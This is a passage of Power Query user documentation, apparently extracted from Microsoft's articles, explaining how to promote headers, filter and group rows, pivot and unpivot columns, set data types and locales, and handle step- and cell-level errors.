7 Note

To learn more about the Power Query M formula language, go to Power Query M
formula language.

You can then transform that query into a function by doing a right-click on the query
and selecting Create Function. Finally, you can invoke your custom function into any of
your queries or values, as shown in the next image.
After a few more transformations, you can see that you've reached your desired output
and leveraged the logic for such a transformation from a custom function.


Promote or demote column headers
Article • 12/17/2022

When creating a new query from unstructured data sources such as text files, Power
Query analyzes the contents of the file. If Power Query identifies a different pattern for
the first row, it will try to promote the first row of data to be the column headings for
your table. However, Power Query might not identify the pattern correctly 100 percent
of the time, so this article explains how you can manually promote or demote column
headers from rows.

To promote rows to column headers


In the following example, Power Query wasn't able to determine the column headers for
the table because the table contains a set of header rows for the first three rows. The
actual column headers for the table are contained in row 5.

Before you can promote the headers, you need to remove the first four rows of the
table. To make that happen, select the table menu in the upper-left corner of the
preview window, and then select Remove top rows.
In the Remove top rows window, enter 4 in the Number of rows box.

7 Note

To learn more about Remove top rows and other table operations, go to Filter by
row position.

The result of that operation will leave the headers as the first row of your table.
Locations of the promote headers operation
From here, you have a number of places where you can select the promote headers
operation:

On the Home tab, in the Transform group.

On the Transform tab, in the Table group.

On the table menu.


After you do the promote headers operation, your table will look like the following
image.

7 Note

Table column names must be unique. If the row you want to promote to a header
row contains multiple instances of the same text string, Power Query will
disambiguate the column headings by adding a numeric suffix preceded by a dot
to every text string that isn't unique.
To demote column headers to rows
In the following example, the column headers are incorrect: they're actually part of the
table's data. You need to demote the headers to be part of the rows of the table.

Locations of the demote headers operation


You have a number of places where you can select the demote headers operation:

On the Home tab, in the Transform group.

On the Transform tab, in the Table group.

After you do this operation, your table will look like the following image.
As a last step, select each column and type a new name for it. The end result will
resemble the following image.

See also
Filter by row position
Filter a table by row position
Article • 12/17/2022

Power Query has multiple options to filter a table based on the positions of its rows,
either by keeping or removing those rows. This article covers all the available methods.

Keep rows
The keep rows set of functions will select a set of rows from the table and remove any
other rows that don't meet the criteria.

There are two places where you can find the Keep rows buttons:

On the Home tab, in the Reduce Rows group.

On the table menu.


7 Note

In the data preview section in the middle of the Power Query window, you can see
the position of your rows on the left side of the table. Each row position is
represented by a number. The top row starts with position 1.

Keep top rows


Imagine the following table that comes out of a system with a fixed layout.
This report always contains seven rows of data, and below the data it has a section for
comments with an unknown number of rows. In this example, you only want to keep the
first seven rows of data. To do that, select Keep top rows from the table menu. In the
Keep top rows dialog box, enter 7 in the Number of rows box.

The result of that change will give you the output table you're looking for. After you set
the data types for your columns, your table will look like the following image.
Keep bottom rows
Imagine the following table that comes out of a system with a fixed layout.

This report always contains seven rows of data at the end of the report page. Above the
data, the report has a section for comments with an unknown number of rows. In this
example, you only want to keep those last seven rows of data and the header row.

To do that, select Keep bottom rows from the table menu. In the Keep bottom rows
dialog box, enter 8 in the Number of rows box.
The result of that operation will give you eight rows, but now your header row is part of
the table.

You need to promote the column headers from the first row of your table. To do this,
select Use first row as headers from the table menu. After you define data types for
your columns, you'll create a table that looks like the following image.

More information: Promote or demote column headers

Keep a range of rows


Imagine the following table that comes out of a system with a fixed layout.
This report always contains five rows for the header, one row of column headers below
the header, seven rows of data below the column headers, and then an unknown
number of rows for its comments section. In this example, you want to get the eight
rows after the header section of the report, and only those eight rows.

To do that, select Keep range of rows from the table menu. In the Keep range of rows
dialog box, enter 6 in the First row box and 8 in the Number of rows box.

Similar to the previous example for keeping bottom rows, the result of this operation
gives you eight rows with your column headers as part of the table. Any rows above the
First row that you defined (row 6) are removed.
You can perform the same operation as described in Keep bottom rows to promote the
column headers from the first row of your table. After you set data types for your
columns, your table will look like the following image.

Remove rows
This set of functions will select a set of rows from the table, remove them, and keep the
rest of the rows in the table.

There are two places where you can find the Remove rows buttons:

On the Home tab, in the Reduce Rows group.

On the table menu.


Remove top rows
Imagine the following table that comes out of a system with a fixed layout.
This report always contains a fixed header from row 1 to row 5 of the table. In this
example, you want to remove these first five rows and keep the rest of the data.

To do that, select Remove top rows from the table menu. In the Remove top rows
dialog box, enter 5 in the Number of rows box.

In the same way as the previous examples for "Keep bottom rows" and "Keep a range of
rows," the result of this operation gives you eight rows with your column headers as part
of the table.

You can perform the same operation as described in previous examples to promote the
column headers from the first row of your table. After you set data types for your
columns, your table will look like the following image.
Remove bottom rows
Imagine the following table that comes out of a system with a fixed layout.

This report always contains a fixed section or footer that occupies the last five rows of
the table. In this example, you want to remove those last five rows and keep the rest of
the data.

To do that, select Remove bottom rows from the table menu. In the Remove top rows
dialog box, enter 5 in the Number of rows box.

The result of that change will give you the output table that you're looking for. After you
set data types for your columns, your table will look like the following image.
Remove alternate rows
Imagine the following table that comes out of a system with a dynamic layout.

The way this report is structured is that you have elements in pairs of rows. Every odd
row (1, 3, 5...) contains the data that you need. Every even row, directly underneath each
odd row, contains comments about each of those records. You don't need the
comments, and you want to remove all of them.

To do that, select Remove alternate rows from the table menu. In the Remove alternate
rows dialog box, enter the following values:

In the First row to remove box, enter 2.


You want to start counting from the second row. Any rows above this First row to
remove will be kept.

In the Number of rows to remove box, enter 1.

Here you start defining the pattern for removing rows. After you find the second
row, you only want to remove that specific row, so you specify that you only need
to remove one row.

In the Number of rows to keep box, enter 1.

After you remove one row, you keep the next row. The process starts again for the
next row.

The result of that selection will give you the output table that you're looking for. After
you set the data types to your columns, your table will look like the following image.
Filter by values in a column
Article • 12/17/2022

In Power Query, you can include or exclude rows according to a specific value in a
column. You can choose from three methods to filter the values in your column:

Sort and filter menu


Cell shortcut menu
Type-specific filter

After you apply a filter to a column, a small filter icon appears in the column heading, as
shown in the following illustration.

Sort and filter menu


In the column header, you'll see an icon with an inverse triangle. When you select this
icon, the sort and filter menu is displayed. With this menu, you can apply or remove any
filters to or from your column.
7 Note

In this article, we'll focus on aspects related to filtering data. To learn more about
the sort options and how to sort columns in Power Query, go to Sort columns.

Remove empty
The Remove empty command applies two filter rules to your column. The first rule gets
rid of any null values. The second rule gets rid of any blank values. For example, imagine
a table with just one text column with five rows, where you have one null value and one
blank cell.
7 Note

A null value is a specific value in the Power Query language that represents no
value.

You then select Remove empty from the sort and filter menu, as shown in the following
image.

You can also select this option from the Home tab in the Reduce Rows group in the
Remove Rows drop-down options, as shown in the next image.
The result of the Remove empty operation gives you the same table without the empty
values.

Clear filter
When a filter is applied to a column, the Clear filter command appears on the sort and
filter menu.
Auto filter
The list in the sort and filter menu is called the auto filter list, which shows the unique
values in your column. You can manually select or deselect which values to include in the
list. Any selected values will be taken into consideration by the filter; any values that
aren't selected will be ignored.

This auto filter section also has a search bar to help you find any values from your list.
7 Note

When you load the auto filter list, only the top 1,000 distinct values in the column
are loaded. If there are more than 1,000 distinct values in the column in the that
you're filtering, a message will appear indicating that the list of values in the filter
list might be incomplete, and the Load more link appears. Select the Load more
link to load another 1,000 distinct values.

If exactly 1,000 distinct values are found again, the list is displayed with a
message stating that the list might still be incomplete.
If fewer than 1,000 distinct values are found, the full list of values is shown.

Cell shortcut menu


You can right-click a particular cell in a column to open the shortcut menu for that value.
Point to the small filter icon, and then select the filter option you want to use.
7 Note

Power Query displays a type-specific filter based on the data type of the column.

Type-specific filters
Depending on the data type of your column, you'll see different commands in the sort
and filter menu. The following images show examples for date, text, and numeric
columns.
Filter rows
When selecting any of the type-specific filters, you'll use the Filter rows dialog box to
specify filter rules for the column. This dialog box is shown in the following image.

The Filter rows dialog box has two modes: Basic and Advanced.

Basic

With basic mode, you can implement up to two filter rules based on type-specific filters.
In the preceding image, notice that the name of the selected column is displayed after
the label Keep rows where, to let you know which column these filter rules are being
implemented on.
For example, imagine that in the following table, you want to filter the Account Code by
all values that start with either PA or PTY.

To do that, you can go to the Filter rows dialog box for the Account Code column and
specify the set of filter rules you want.

In this example, first select the Basic button. Then under Keep rows where "Account
Code", select begins with, and then enter PA. Then select the or button. Under the or
button, select begins with, and then enter PTY. The select OK.

The result of that operation will give you the set of rows that you're looking for.

Advanced
With advanced mode, you can implement as many type-specific filters as necessary from
all the columns in the table.

For example, imagine that instead of applying the previous filter in basic mode, you
wanted to implement a filter to Account Code to show all values that end with 4. Also,
you want to show values over $100 in the Sales column.

In this example, first select the Advanced button. In the first row, select Account Code
under Column name, ends with under Operator, and select 4 for the Value. In the
second row, select and, and then select Sales under Column Name, is greater than
under Operator, and 100 under Value. Then select OK

The result of that operation will give you just one row that meets both criteria.

7 Note

You can add as many clauses as you'd like by selecting Add clause. All clauses act
at the same level, so you might want to consider creating multiple filter steps if you
need to implement filters that rely on other filters.
Choose or remove columns
Article • 12/17/2022

Choose columns and Remove columns are operations that help you define what
columns your table needs to keep and which ones it needs to remove. This article will
showcase how to use the Choose columns and Remove columns commands by using
the following sample table for both operations.

The goal is to create a table that looks like the following image.

Choose columns
On the Home tab, in the Manage columns group, select Choose columns.

The Choose columns dialog box appears, containing all the available columns in your
table. You can select all the fields that you want to keep and remove specific fields by
clearing their associated check box. For this example, you want to remove the GUID and
Report created by columns, so you clear the check boxes for those fields.
After selecting OK, you'll create a table that only contains the Date, Product,
SalesPerson, and Units columns.

Remove columns
When you select Remove columns from the Home tab, you have two options:

Remove columns: Removes the selected columns.


Remove other columns: Removes all columns from the table except the selected
ones.
Remove selected columns
Starting from the sample table, select the GUID and the Report created columns. Right-
click to select any of the column headings. A new shortcut menu appears, where you
can select the Remove columns command.

After selecting Remove columns, you'll create a table that only contains the Date,
Product, SalesPerson, and Units columns.

Remove other columns


Starting from the sample table, select all the columns from the table except GUID and
Report created. On the Home tab, select Remove columns > Remove other columns.
After selecting Remove other columns, you'll create a table that only contains the Date,
Product, SalesPerson, and Units columns.
Grouping or summarizing rows
Article • 03/21/2023

In Power Query, you can group values in various rows into a single value by grouping
the rows according to the values in one or more columns. You can choose from two
types of grouping operations:

Column groupings.

Row groupings.

For this tutorial, you'll be using the following sample table.

Where to find the Group by button


You can find the Group by button in three places:

On the Home tab, in the Transform group.

On the Transform tab, in the Table group.


On the shortcut menu when you right-click to select columns.

Use an aggregate function to group by one or


more columns
In this example, your goal is to summarize the total units sold at the country and sales
channel level. You'll use the Country and Sales Channel columns to perform the group
by operation.

1. Select Group by on the Home tab.


2. Select the Advanced option, so you can select multiple columns to group by.
3. Select the Country column.
4. Select Add grouping.
5. Select the Sales Channel column.
6. In New column name, enter Total units, in Operation, select Sum, and in Column,
select Units.
7. Select OK
This operation gives you the following table.

Operations available
With the Group by feature, the available operations can be categorized in two ways:

Row level operation


Column level operation

The following table describes each of these operations.

Operation Category Description


Name
Operation Category Description
Name

Sum Column Sums up all values from a column


operation

Average Column Calculates the average value from a column


operation

Median Column Calculates the median from a column


operation

Min Column Calculates the minimum value from a column


operation

Max Column Calculates the maximum value from a column


operation

Percentile Column Calculates the percentile, using an input value from 0 to 100,
operation from a column

Count distinct Column Calculates the number of distinct values from a column
values operation

Count rows Row Calculates the total number of rows from a given group
operation

Count distinct Row Calculates the number of distinct rows from a given group
rows operation

All rows Row Outputs all grouped rows in a table value with no
operation aggregations

7 Note

The Count distinct values and Percentile operations are only available in Power
Query Online.

Perform an operation to group by one or more


columns
Starting from the original sample, in this example you'll create a column containing the
total units and two other columns that give you the name and units sold for the top-
performing product, summarized at the country and sales channel level.
1. Use the following columns as Group by columns:

Country
Sales Channel

2. Create two new columns by following these steps:


a. Aggregate the Units column by using the Sum operation. Name this column
Total units.
b. Add a new Products column by using the All rows operation.

After that operation is complete, notice how the Products column has [Table] values
inside each cell. Each [Table] value contains all the rows that were grouped by the
Country and Sales Channel columns from your original table. You can select the white
space inside the cell to see a preview of the contents of the table at the bottom of the
dialog box.
7 Note

The details preview pane might not show all the rows that were used for the group-
by operation. You can select the [Table] value to see all rows pertaining to the
corresponding group-by operation.

Next, you need to extract the row that has the highest value in the Units column of the
tables inside the new Products column, and call that new column Top performer
product.

Extract the top performer product information


With the new Products column with [Table] values, you create a new custom column by
going to the Add Column tab on the ribbon and selecting Custom column from the
General group.

Name your new column Top performer product. Enter the formula
Table.Max([Products], "Units" ) under Custom column formula.
The result of that formula creates a new column with [Record] values. These record
values are essentially a table with just one row. These records contain the row with the
maximum value for the Units column of each [Table] value in the Products column.

With this new Top performer product column that contains [Record] values, you can
select the expand icon, select the Product and Units fields, and then select OK.
After removing your Products column and setting the data type for both newly
expanded columns, your result will resemble the following image.

Fuzzy grouping

7 Note

The following feature is only available in Power Query Online.

To demonstrate how to do "fuzzy grouping," consider the sample table shown in the
following image.
The goal of fuzzy grouping is to do a group-by operation that uses an approximate
match algorithm for text strings. Power Query uses the Jaccard similarity algorithm to
measure the similarity between pairs of instances. Then it applies agglomerative
hierarchical clustering to group instances together. The following image shows the
output that you expect, where the table will be grouped by the Person column.

To do the fuzzy grouping, you perform the same steps previously described in this
article. The only difference is that this time, in the Group by dialog box, you select the
Use fuzzy grouping check box.
For each group of rows, Power Query will pick the most frequent instance as the
"canonical" instance. If multiple instances occur with the same frequency, Power Query
will pick the first one. After you select OK in the Group by dialog box, you'll get the
result that you were expecting.

However, you have more control over the fuzzy grouping operation by expanding Fuzzy
group options.
The following options are available for fuzzy grouping:

Similarity threshold (optional): This option indicates how similar two values must
be to be grouped together. The minimum setting of 0 will cause all values to be
grouped together. The maximum setting of 1 will only allow values that match
exactly to be grouped together. The default is 0.8.
Ignore case: When comparing text strings, case will be ignored. This option is
enabled by default.
Group by combining text parts: The algorithm will try to combine text parts (such
as combining Micro and soft into Microsoft) to group values.
Show similarity scores: Show similarity scores between the input values and the
computed representative values after fuzzy grouping. Requires the addition of an
operation such as All rows to showcase this information on a row-by-row level.
Transformation table (optional): You can select a transformation table that will
map values (such as mapping MSFT to Microsoft) to group them together.

For this example, a transformation table will be used to demonstrate how values can be
mapped. The transformation table has two columns:

From: The text string to look for in your table.


To: The text string to use to replace the text string in the From column.
The following image shows the transformation table used in this example.

) Important

It's important that the transformation table has a the same columns and column
names as shown above (they have to be "From" and "To"), otherwise Power Query
will not recognize these.

Return to the Group by dialog box, expand Fuzzy group options, change the operation
from Count rows to All rows, enable the Show similarity scores option, and then select
the Transformation table drop-down menu.

After you select the transformation table, select OK. The result of that operation gives
you the following information:
In this example, the Ignore case option was enabled, so the values in the From column
of the Transformation table are used to look for the text string without considering the
case of the string. This transformation operation occurs first, and then the fuzzy
grouping operation is performed.

The similarity score is also shown in the table value next to the person column, which
reflects exactly how the values were grouped and their respective similarity scores. You
can expand this column if needed or use the values from the new Frequency columns
for other sorts of transformations.

7 Note

When grouping by multiple columns, the transformation table performs the replace
operation in all columns if replacing the value increases the similarity score.

See also
Add a custom column
Remove duplicates
Unpivot columns
Article • 12/17/2022

In Power Query, you can transform columns into attribute-value pairs, where columns
become rows.

For example, given a table like the following, where country rows and date columns
create a matrix of values, it's difficult to analyze the data in a scalable way.

Instead, you can transform the table into a table with unpivoted columns, as shown in
the following image. In the transformed table, it's easier to use the date as an attribute
to filter on.
The key in this transformation is that you have a set of dates in the table that should all
be part of a single column. The respective value for each date and country should be in
a different column, effectively creating an attribute-value pair.

Power Query will always create the attribute-value pair by using two columns:

Attribute: The name of the column headings that were unpivoted.


Value: The values that were underneath each of the unpivoted column headings.

There are multiple places in the user interface where you can find Unpivot columns. You
can right-click the columns that you want to unpivot, or you can select the command
from the Transform tab in the ribbon.
There are three ways that you can unpivot columns from a table:

Unpivot columns
Unpivot other columns
Unpivot only selected columns

Unpivot columns
For the scenario described above, you first need to select the columns you want to
unpivot. You can select Ctrl as you select as many columns as you need. For this
scenario, you want to select all the columns except the one named Country. After
selecting the columns, right-click any of the selected columns, and then select Unpivot
columns.
The result of that operation will yield the result shown in the following image.

Special considerations
After creating your query from the steps above, imagine that your initial table gets
updated to look like the following screenshot.

Notice that you've added a new column for the date 9/1/2020 (September 1, 2020), and
two new rows for the countries UK and Mexico.

If you refresh your query, you'll notice that the operation will be done on the updated
column, but won't affect the column that wasn't originally selected (Country, in this
example). This means that any new column that's added to the source table will be
unpivoted as well.

The following image shows what your query will look like after the refresh with the new
updated source table.
Unpivot other columns
You can also select the columns that you don't want to unpivot and unpivot the rest of
the columns in the table. This operation is where Unpivot other columns comes into
play.
The result of that operation will yield exactly the same result as the one you got from
Unpivot columns.
7 Note

This transformation is crucial for queries that have an unknown number of columns.
The operation will unpivot all columns from your table except the ones that you've
selected. This is an ideal solution if the data source of your scenario got new date
columns in a refresh, because those will get picked up and unpivoted.

Special considerations
Similar to the Unpivot columns operation, if your query is refreshed and more data is
picked up from the data source, all the columns will be unpivoted except the ones that
were previously selected.

To illustrate this, say that you have a new table like the one in the following image.

You can select the Country column, and then select Unpivot other column, which will
yield the following result.
Unpivot only selected columns
The purpose of this last option is to only unpivot specific columns from your table. This
is important for scenarios where you're dealing with an unknown number of columns
from your data source and you only want to unpivot the selected columns.

To perform this operation, select the columns to unpivot, which in this example is all the
columns except the Country column. Then right-click any of the columns you selected,
and then select Unpivot only selected columns.
Notice how this operation will yield the same output as the previous examples.

Special considerations
After doing a refresh, if our source table changes to have a new 9/1/2020 column and
new rows for UK and Mexico, the output of the query will be different from the previous
examples. Say that our source table, after a refresh, changes to the table in the following
image.
The output of our query will look like the following image.

It looks like this because the unpivot operation was applied only on the 6/1/2020,
7/1/2020, and 8/1/2020 columns, so the column with the header 9/1/2020 remains
unchanged.
Pivot columns
Article • 12/17/2022

In Power Query, you can create a table that contains an aggregate value for each unique
value in a column. Power Query groups each unique value, does an aggregate
calculation for each value, and pivots the column into a new table.

Imagine a table like the one in the following image.

This table contains values by country and date in a simple table. In this example, you
want to transform this table into the one where the date column is pivoted, as shown in
the following image.

7 Note
During the pivot columns operation, Power Query will sort the table based on the
values found on the first column—at the left side of the table—in ascending order.

To pivot a column

1. Select the column that you want to pivot.

2. On the Transform tab in the Any column group, select Pivot column.

3. In the Pivot column dialog box, in the Value column list, select Value.

By default, Power Query will try to do a sum as the aggregation, but you can select
the Advanced option to see other available aggregations.
The available options are:

Don't aggregate
Count (all)
Count (not blank)
Minimum
Maximum
Median
Sum
Average

Pivoting columns that can't be aggregated


You can pivot columns without aggregating when you're working with columns that
can't be aggregated, or aggregation isn't required for what you're trying to do. For
example, imagine a table like the following image, that has Country, Position, and
Product as fields.
Let's say you want to pivot the Position column in this table so you can have its values
as new columns. For the values of these new columns, you'll use the values from the
Product column. Select the Position column, and then select Pivot column to pivot that
column.

In the Pivot column dialog box, select the Product column as the value column. Select
the Advanced option button in the Pivot columns dialog box, and then select Don't
aggregate.
The result of this operation will yield the result shown in the following image.

Errors when using the Don't aggregate option


The way the Don't aggregate option works is that it grabs a single value for the pivot
operation to be placed as the value for the intersection of the column and row pair. For
example, let's say you have a table like the one in the following image.

You want to pivot that table by using the Date column, and you want to use the values
from the Value column. Because this pivot would make your table have just the Country
values on rows and the Dates as columns, you'd get an error for every single cell value
because there are multiple rows for every combination of Country and Date. The
outcome of the Pivot column operation will yield the results shown in the following
image.

Notice the error message "Expression.Error: There were too many elements in the
enumeration to complete the operation." This error occurs because the Don't aggregate
operation only expects a single value for the country and date combination.
Transpose a table
Article • 12/17/2022

The transpose table operation in Power Query rotates your table 90 degrees, turning
your rows into columns and your columns into rows.

Imagine a table like the one in the following image, with three rows and four columns.

The goal of this example is to transpose that table so you end up with four rows and
three columns.

On the Transform tab in the ribbon, select Transpose.

The result of that operation will look like the following image.
7 Note

Only the contents of the table will be transposed during the transpose operation;
the column headers of the initial table will be lost. The new columns will have the
name Column followed by a sequential number.

The headers you need in this example are in the first row of the table. To promote the
first row to headers, select the table icon in the upper-left corner of the data preview,
and then select Use first row as headers.
The result of that operation will give you the output that you're looking for.

7 Note

To learn more about the promote headers operation, also known as Use first row
as headers, go to Promote or demote column headers.
Reverse rows
Article • 12/17/2022

With Power Query, it's possible to reverse the order of rows in a table.

Imagine a table with two columns, ID and Country, as shown in the following image.

On the Transform tab, select Reverse rows.

The result of this operation will look as follows.


Data types in Power Query
Article • 12/17/2022

Data types in Power Query are used to classify values to have a more structured dataset.
Data types are defined at the field level—values inside a field are set to conform to the
data type of the field.

The data type of a column is displayed on the left side of the column heading with an
icon that symbolizes the data type.

7 Note

Power Query provides a set of contextual transformations and options based on


the data type of the column. For example, when you select a column with a data
type of Date, you get transformations and options that apply to that specific data
type. These transformations and options occur throughout the Power Query
interface, such as on the Transform and Add column tabs and the smart filter
options.

The most common data types used in Power Query are listed in the following table.
Although beyond the scope of this article, you can find the complete list of data types in
the Power Query M formula language Types article.

Data type Icon Description

Text A Unicode character data string. Can be strings, numbers, or dates


represented in a text format. Maximum string length is
268,435,456 Unicode characters (where each Unicode character is
two bytes) or 536,870,912 bytes.

True/False A Boolean value of either True or False.


Data type Icon Description

Decimal number Represents a 64-bit (eight-byte) floating-point number. It's the


most common number type, and corresponds to numbers as you
usually think of them. Although designed to handle numbers with
fractional values, it also handles whole numbers. The Decimal
Number type can handle negative values from –1.79E +308
through –2.23E –308, 0, and positive values from 2.23E –308
through 1.79E + 308. For example, numbers like 34, 34.01, and
34.000367063 are valid decimal numbers. The largest precision
that can be represented in a Decimal Number type is 15 digits
long. The decimal separator can occur anywhere in the number.
The Decimal Number type corresponds to how Excel stores its
numbers. Note that a binary floating-point number can't
represent all numbers within its supported range with 100%
accuracy. Thus, minor differences in precision might occur when
representing certain decimal numbers.

Fixed decimal Also known as the Currency type, this data type has a fixed
number location for the decimal separator. The decimal separator always
has four digits to its right and allows for 19 digits of significance.
The largest value it can represent is 922,337,203,685,477.5807
(positive or negative). Unlike Decimal Number, the Fixed Decimal
Number type is always precise and is thus useful in cases where
the imprecision of floating-point notation might introduce errors.

Whole number Represents a 64-bit (eight-byte) integer value. Because it's an


integer, it has no digits to the right of the decimal place. It allows
for 19 digits; positive or negative whole numbers between –
9,223,372,036,854,775,807 (–2^63+1) and
9,223,372,036,854,775,806 (2^63–2). It can represent the largest
possible precision of the various numeric data types. As with the
Fixed Decimal Number type, the Whole Number type can be
useful in cases where you need to control rounding.

Percentage Fundamentally the same as a Decimal Number type, but it has a


mask to format the values in the column as a percentage in the
Power Query Editor window.

Date/Time Represents both a date and time value. Underneath the covers,
the Date/Time value is stored as a Decimal Number type, so you
can actually convert between the two. The time portion of a date
is stored as a fraction to whole multiples of 1/300 seconds (3.33
ms). Dates between the years 1900 and 9999 are supported.

Date Represents just a date (no time portion). When converted into the
model, a Date is the same as a Date/Time value with zero for the
fractional value.
Data type Icon Description

Time Represents just time (no date portion). When converted into the
model, a Time value is the same as a Date/Time value with no
digits to the left of the decimal place.

Date/Time/Timezone Represents a UTC Date/Time with a time-zone offset. It's


converted into Date/Time when loaded into the model.

Duration Represents a length of time, which is converted into a Decimal


Number type when loaded into the model. As a Decimal Number
type, it can be added or subtracted from a Date/Time field with
correct results. Because it's a Decimal Number type, you can easily
use it in visualizations that show magnitude.

Binary The Binary data type can be used to represent any other data with
a binary format.

Any The Any data type is the status given to a column that doesn't
have an explicit data type definition. Any is the data type that
classifies all values. We recommend that you always explicitly
define the column data types for your queries from unstructured
sources, and avoid having any columns with the Any data type as
the output of your query.

Data type detection


Data type detection occurs automatically when connecting to:

Structured data sources such as databases, Power Query reads the table schema
from the data source and automatically displays the data by using the correct data
type for each column.

Unstructured sources such as Excel, CSV, and text files, Power Query automatically
detects data types by inspecting the values in the table. By default, automatic data
type detection is enabled in Power Query for unstructured sources.

You can also use the Detect data type command in the Any column group on the
Transform tab to automatically detect the data types of the columns in your table.
How to define a column data type
You can define or change the data type of a column in any of four places:

On the Home tab, in the Transform group, on the Data type drop-down menu.

On the Transform tab, in the Any column group, on the Data type drop-down
menu.

By selecting the icon on the left side of the column heading.


On the column shortcut menu, under Change Type.
Automatic detection of column data type and headers
This setting is specifically for unstructured sources. It helps you by automatically
inspecting and detecting column types and headers based on the first 200 rows of your
table. When this setting is enabled, Power Query automatically adds two steps to your
query:

Promote column headers: Promotes the first row of the table to be the column
header.
Changed type: Converts the values from the Any data type to a data type based
on the inspection of the values from each column.

By default, this setting is enabled. To disable or enable this setting, follow the steps that
apply to your Power Query experience.

To configure automatic data type detection in Power Query Online


On the Home tab, select Options, and then select Project options. In the Project
options window, select the Automatically detect column types and headers for
unstructured sources check box.

To configure automatic data type detection in Power Query for Desktop

You can define this behavior both at the global and per-file level in the Options window
(in the Power Query Editor, on the File tab, select Options and settings > Options).

Global: On the left pane under Global, select Data load. On the right pane under
Type detection, you can select any of three type detection configurations that will
be applied to every new file created in your application:
Always detect column types and headers for unstructured sources
Detect column types and headers for unstructured sources according to each
file's setting
Never detect column types and headers for unstructured sources
Current file: On the left pane under Current file, select Data load. On the right
pane under Type detection, select whether you want to enable or disable type
detection for the current file.
Document or project locale
Power Query handles two distinct components that manage the way that things look
and are interpreted:

Localization: the component that tells Power Query in what language it should be
displayed.
Globalization: the component that handles the formatting of the values, in addition
to the interpretation of text values.

Locale is a single value that holds both the localization and globalization components.
Locale is used to interpret text values and convert them into other data types. For
example, the locale English (United States) means that the localization is in United
States English and the globalization, or format of the value, is based on the standards
used in the United States.

When Power Query defines a column data type or converts from one data type to
another, it has to interpret the values to be converted before it can transform them to a
different data type.

In Power Query Online, this interpretation is defined in Project options, under


Locale.

In Power Query for Desktop, Power Query automatically recognizes your operating
system regional format and uses that to interpret the values for data type
conversion. To override this locale configuration, open the query Options window,
and in the left pane under Current file, select Regional settings. From here, you
can change the locale to the setting you want.
This locale setting is important for interpreting text values into a specific data type. For
example, imagine that you have your locale set as English (United States), but a column
in one of your CSV files has dates formatted in the United Kingdom format of
day/month/year.

When you try setting the data type of the Date column to be Date, you get error values.
These errors occur because the locale being used is trying to interpret the date in the
English (United States) format, which is month/day/year. Because there's no month 22 in
the calendar, it causes an error.

Instead of trying to just select the Date data type, you can right-click the column
heading, select Change type, and then select Using locale.
In the Change column type with locale dialog box, you select the data type that you
want to set, but you also select which locale to use, which in this case needs to be
English (United Kingdom).
Using this locale, Power Query will be able to interpret values correctly and convert
those values to the right data type.

To verify final date values

The formatting of the values is driven by the globalization value. If you have any doubts
about the value displayed by Power Query, you can verify the conversion of date values
by adding new columns for the day, month, and year from the value. To do this, select
the Date column and go to the Add column tab on the ribbon. In the Date and time
column group, you'll see the options for a date column.
From here, you can extract parts of the date value, such as the year number, the month
number, the day number, or even more columns extracted from the Date column.

By using these columns, you can verify that your date value has been converted
correctly.

Data type conversion matrix


The following matrix is designed to give you a quick look at the feasibility of data type
conversion of a value from one data type to another.
7 Note

Conversion in this matrix starts with the original data type in the Data types
column. Each result of a conversion to the new type is shown in the original data
type’s row.

Data Types

Decimal number —

Currency —

Whole number —

Percentage —

Date/Time —

Date —

Time —

Date/Time/Timezone —

Duration —

Text —

True/False —

Icon Description

Possible

Not possible

Possible, but it adds values to the original value

Possible, but it truncates the original value


Dealing with errors in Power Query
Article • 12/17/2022

In Power Query, you can encounter two types of errors:

Step-level errors
Cell-level errors

This article provides suggestions for how to fix the most common errors you might find
at each level, and describes the error reason, error message, and error detail for each.

Step-level error
A step-level error prevents the query from loading and displays the error components in
a yellow pane.

Error reason: The first section before the colon. In the example above, the error
reason is Expression.Error.
Error message: The section directly after the reason. In the example above, the
error message is The column 'Column' of the table wasn't found.
Error detail: The section directly after the Details: string. In the example above, the
error detail is Column.

Common step-level errors


In all cases, we recommend that you take a close look at the error reason, error
message, and error detail to understand what's causing the error. You can select the Go
to error button, if available, to view the first step where the error occurred.

Can't find the source - DataSource.Error


This error commonly occurs when the data source is inaccessible by the user, the user
doesn't have the correct credentials to access the data source, or the source has been
moved to a different place.

Example: You have a query from a text tile that was located in drive D and created by
user A. User A shares the query with user B, who doesn't have access to drive D. When
this person tries to execute the query, they get a DataSource.Error because there's no
drive D in their environment.

Possible solutions: You can change the file path of the text file to a path that both users
have access to. As user B, you can change the file path to be a local copy of the same
text file. If the Edit settings button is available in the error pane, you can select it and
change the file path.

The column of the table wasn't found


This error is commonly triggered when a step makes a direct reference to a column
name that doesn't exist in the query.

Example: You have a query from a text file where one of the column names was Column.
In your query, you have a step that renames that column to Date. But there was a
change in the original text file, and it no longer has a column heading with the name
Column because it was manually changed to Date. Power Query is unable to find a
column heading named Column, so it can't rename any columns. It displays the error
shown in the following image.

Possible solutions: There are multiple solutions for this case, but they all depend on
what you'd like to do. For this example, because the correct Date column header already
comes from your text file, you can just remove the step that renames the column. This
will allow your query to run without this error.

Other common step-level errors


When combining or merging data between multiple data sources, you might get a
Formula.Firewall error such as the one shown in the following image.

This error can be caused by a number of reasons, such as the data privacy levels
between data sources or the way that these data sources are being combined or
merged. For more information about how to diagnose this issue, go to Data privacy
firewall.

Cell-level error
A cell-level error won't prevent the query from loading, but displays error values as Error
in the cell. Selecting the white space in the cell displays the error pane underneath the
data preview.

7 Note

The data profiling tools can help you more easily identify cell-level errors with the
column quality feature. More information: Data profiling tools

Handling errors at the cell level


When encountering any cell-level errors, Power Query provides a set of functions to
handle them either by removing, replacing, or keeping the errors.
For the next sections, the provided examples will be using the same sample query as the
start point. In this query, you have a Sales column that has one cell with an error caused
by a conversion error. The value inside that cell was NA, but when you transformed that
column to a whole number Power Query couldn't convert NA to a number, so it displays
the following error.

Remove errors
To remove rows with errors in Power Query, first select the column that contains errors.
On the Home tab, in the Reduce rows group, select Remove rows. From the drop-down
menu, select Remove errors.

The result of that operation will give you the table that you're looking for.
Replace errors
If instead of removing rows with errors, you want to replace the errors with a fixed value,
you can do so as well. To replace rows that have errors, first select the column that
contains errors. On the Transform tab, in the Any column group, select Replace values.
From the drop-down menu, select Replace errors.

In the Replace errors dialog box, enter the value 10 because you want to replace all
errors with the value 10.

The result of that operation will give you the table that you're looking for.

Keep errors
Power Query can serve as a good auditing tool to identify any rows with errors even if
you don't fix the errors. This is where Keep errors can be helpful. To keep rows that have
errors, first select the column that contains errors. On the Home tab, in the Reduce rows
group, select Keep rows. From the drop-down menu, select Keep errors.

The result of that operation will give you the table that you're looking for.

Common cell-level errors


As with any step-level error, we recommend that you take a close look at the error
